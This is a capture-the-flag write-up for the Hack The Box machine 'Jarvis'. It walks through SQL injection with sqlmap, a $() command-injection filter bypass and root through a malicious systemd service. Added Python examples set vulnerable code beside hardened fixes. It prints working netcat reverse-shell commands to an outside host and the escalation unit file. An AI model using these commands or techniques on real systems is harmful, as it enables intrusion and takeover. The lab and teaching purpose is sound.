
Hello fellow hackers, today I'm going to solve Jarvis from Hack The Box.
So let's get started!
I started with nmap to discover the open ports on the machine:
nmap -A -sT -v 10.10.10.143

So the box has two ports open:
1- SSH running on port 22
2- Apache web server running on port 80
Let's check out port 80!

It's a hotel website, "Stark Hotel". After poking around the site I found /room.php, a page for renting rooms that pulls the room data from the database, so I decided to test it for SQL injection using sqlmap:

sqlmap -u "http://10.10.10.143/room.php?cod=5" --level=5 --risk=3

And yes! The cod parameter is vulnerable to SQL injection, so I tried to pop a shell using sqlmap's --os-shell option.

And boom! We are in as the www-data user. To get a more stable shell I used the os-shell to launch an nc reverse shell back to my box.
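To make the finding above concrete, here is an added example (not code from the original writeup or from the box) that mimics what sqlmap found on room.php?cod=: a query built by string concatenation beside the parameterised version, plus the kind of boolean-based probe sqlmap runs first and a UNION dump once injection is confirmed. The table name, columns and rows are constructed for the example, since the writeup does not show the real schema.

```python
import sqlite3

# Constructed sample rows standing in for the hotel's rooms table (assumption: the real
# schema behind room.php is not shown in the writeup, so table and columns are made up).
ROOMS = [(1, "Single", 60), (2, "Double", 90), (3, "Twin", 110), (5, "Suite", 250)]


def _db() -> sqlite3.Connection:
    """Fresh in-memory database so every lookup runs against the same known data."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE room (cod INTEGER PRIMARY KEY, name TEXT, price INTEGER)")
    con.executemany("INSERT INTO room VALUES (?, ?, ?)", ROOMS)
    return con


def vulnerable_lookup(cod: str) -> list:
    """Concatenates the request parameter straight into the SQL, the behaviour
    sqlmap detected on ?cod=. Whatever the client sends becomes part of the query."""
    con = _db()
    return con.execute("SELECT cod, name, price FROM room WHERE cod = " + cod).fetchall()


def safe_lookup(cod: str) -> list:
    """Hardened form: enforce the expected type, then bind the value as a parameter.
    The payload is never parsed as SQL, so 'cod=5 OR 1=1' simply fails validation."""
    try:
        value = int(cod)
    except ValueError:
        return []
    con = _db()
    return con.execute(
        "SELECT cod, name, price FROM room WHERE cod = ?", (value,)
    ).fetchall()


def looks_injectable(lookup, base: str = "5") -> bool:
    """Boolean-based probe in the spirit of sqlmap's first checks: appending a true
    condition must leave the result unchanged, a false one must change it."""
    baseline = lookup(base)
    true_case = lookup(f"{base} AND 1=1")
    false_case = lookup(f"{base} AND 1=2")
    return baseline != [] and true_case == baseline and false_case != baseline


def dump_via_union(lookup) -> list:
    """With injection confirmed, a UNION makes the page return rows it never
    meant to show (here the whole table; on a real target any table in reach)."""
    return lookup("-1 UNION SELECT cod, name, price FROM room")


if __name__ == "__main__":
    print("vulnerable, cod=5          :", vulnerable_lookup("5"))
    print("vulnerable, cod=5 OR 1=1   :", vulnerable_lookup("5 OR 1=1"))
    print("vulnerable injectable?     :", looks_injectable(vulnerable_lookup))
    print("safe injectable?           :", looks_injectable(safe_lookup))
    print("vulnerable UNION dump      :", dump_via_union(vulnerable_lookup))
    print("safe UNION dump            :", dump_via_union(safe_lookup))
```

The probe is the same trick `--level`/`--risk` scale up: the tool has no view of the SQL, only of whether the response changes, so any parameter whose page content flips between `AND 1=1` and `AND 1=2` is worth a closer look.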

After getting the shell I tried to read the user flag, but www-data has no permission to read it, so I needed to escalate my privileges.
After some enumeration I found that www-data can use sudo to execute simpler.py as the pepper user.
Running the script, it has an option to execute a ping command, so I tried to inject commands into it, but the usual separator characters used to chain commands are forbidden by the script's filter. After some googling I found an article about wrapping commands in $(), which the filter does not block, so I tried it and it worked!

Now we need to get a shell as pepper using this technique, so I put an nc command into a bash script:
#!/bin/bash
nc -nv 10.10.14.104 1995 -e /bin/bash
Then I set up my listener on port 1995 and called the file from inside the script's ping prompt. That gave me a shell as pepper, and I could read the user flag!
$(bash shell.sh)
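Since simpler.py is a Python script with a character blacklist in front of ping, here is an added example (mine, not the box's script) of why the $() trick works: a blacklist that blocks separators but forgets command substitution, shown beside a hardened version that validates the target as an IP address and never goes through a shell. The blacklist contents are an assumption modelled on the writeup's description, and `echo` stands in for `ping` so the example runs offline; the shell expansion is the same.

```python
import ipaddress
import subprocess

# Assumed blacklist modelled on the writeup's description of simpler.py (the real list is
# not reproduced there): the obvious separators are blocked, but "$" and "(" are not.
FORBIDDEN = ["&", ";", "|", "`"]


def blocked_by_filter(target: str) -> bool:
    """The script's check as described: reject the input if any forbidden token appears."""
    return any(tok in target for tok in FORBIDDEN)


def vulnerable_ping(target: str) -> str:
    """Vulnerable pattern: pass the filter, then glue the input into a command string
    and hand it to a shell. 'echo' replaces 'ping' here so nothing touches the network;
    $(...) is expanded by the shell before echo (or ping) ever sees its arguments."""
    if blocked_by_filter(target):
        return "blocked"
    cmd = "echo ping -c 1 " + target
    out = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return out.stdout.strip()


def is_valid_target(target: str) -> bool:
    """Allow-list instead of a blacklist: accept only something that parses as an IP."""
    try:
        ipaddress.ip_address(target.strip())
        return True
    except ValueError:
        return False


def safe_ping_argv(target: str) -> list:
    """Hardened form: validate first, then build argv directly so no shell is involved.
    Run it with subprocess.run(argv); a stray $(...) could only ever be a literal string."""
    if not is_valid_target(target):
        raise ValueError("target must be a plain IPv4/IPv6 address")
    return ["ping", "-c", "1", str(ipaddress.ip_address(target.strip()))]


if __name__ == "__main__":
    for probe in ["10.10.14.104", "10.10.14.104; id", "$(echo injected)"]:
        print(f"{probe!r:>22} -> filter blocks: {blocked_by_filter(probe)!s:5} "
              f"shell sees: {vulnerable_ping(probe)!r}")
    print("hardened argv:", safe_ping_argv("10.10.14.104"))
```

The lesson is the one the box teaches: a blacklist of separators is only as good as its author's memory of shell syntax, while an allow-list plus `subprocess.run` with a list of arguments and no shell removes the whole class of bypasses, $() included.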

Now for the root part. After some enumeration I had nothing, but I noticed something odd: I could run systemctl, the control and inspection tool for systemd services. It only printed a warning that I had no permission, yet otherwise it seemed to work fine for me, which suggests the binary runs with elevated privileges (worth confirming by checking its permissions; the setuid bit is the usual cause).
After some googling I found a way to exploit it.
First we create a service unit configured to run a script containing our reverse shell, then we create the script it points at.
Let's call our service X.
nano x.service
[Unit]
Description=X

[Service]
ExecStart=/bin/bash /home/pepper/shell.sh

[Install]
WantedBy=multi-user.target
nano shell.sh
#!/bin/bash
nc -nv 10.10.14.104 1997 -e /bin/bash
Now let's set up our listener on port 1997 and enable and start the service in one go (enabling by full path links the unit file into systemd):
systemctl enable /home/pepper/x.service --now
And let there be root!

SMT Red Team